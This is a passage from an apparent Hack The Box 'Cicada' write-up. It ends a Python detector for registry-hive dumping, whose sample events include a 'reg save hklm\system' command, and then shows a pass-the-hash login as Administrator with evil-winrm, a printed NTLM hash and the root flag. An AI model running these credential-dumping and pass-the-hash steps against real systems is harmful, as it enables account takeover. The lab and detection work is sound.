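    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save hklm\\system C:\\Users\\emily.oscars.CICADA\\Documents\\system.hive"},
    {"EventID": 4688, "SubjectUserName": "john.smoulder",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query hklm\\software\\microsoft\\windows\\currentversion"},
]

if __name__ == "__main__":
    for severity, msg in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {msg}")
```

The 'high' correlation is the one to page on: once SAM and SYSTEM leave the box together, the local Administrator hash is as good as stolen, which is exactly what the next section shows.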
Login As Administrator
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ evil-winrm -i cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
450a37e2437bccb9112ad8704f6ae19b
*Evil-WinRM* PS C:\Users\Administrator\Documents>